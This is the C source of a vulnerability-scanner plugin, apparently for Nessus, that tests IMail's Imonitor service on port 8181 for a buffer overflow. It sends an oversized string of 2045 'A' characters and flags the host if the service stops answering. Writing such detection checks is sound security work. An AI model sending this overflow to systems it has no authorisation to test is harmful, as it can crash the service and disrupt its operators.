/*
 * 
 * imail_imap
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>

#define NAME "IMail's Imonitor buffer overflow"
#define DESC "\
The Imonitor service does insufficient bounds checking\n\
on the user input, resulting in a possible buffer overflow.\n\
Risk factor : high"
#define COPYRIGHT "found by the eEye Digital Security Team"
#define SUMM "IMail's IMonitor buffer overflow"



PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_GATHER_INFO);
	plug_set_family(desc, "Gain root remotely");
	return(0);
}

     

PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	int port = 8181;
	
	if(host_get_port_state(args, port)>0)
	{
	 int soc = open_sock_tcp(args, port);
	 if(soc<0)return(0);
	 else
	 {
	  char * buf = emalloc(2046);
	  char * command;
	  memset(buf, 'A', 2045);
	
	  command = emalloc(5000);
          recv_line(soc, command, 5000);
	  sprintf(command, "%s\n\n", buf);
	  efree(&buf);
#ifndef NESSUS_NT
          signal(SIGPIPE, SIG_IGN);
#endif
	  send(soc, command, strlen(command),0);
	  recv_line(soc, command, 2048);
	  if(!strlen(command))
	   post_hole(args, port, 
"The remote imail's Imonitor is subject to a buffer overrun attack\n\
which may allow any remote user to execute arbitrary code easily\n");
	 efree(&command);
	 socket_close(soc);
	 }
	}
	return(0);
}
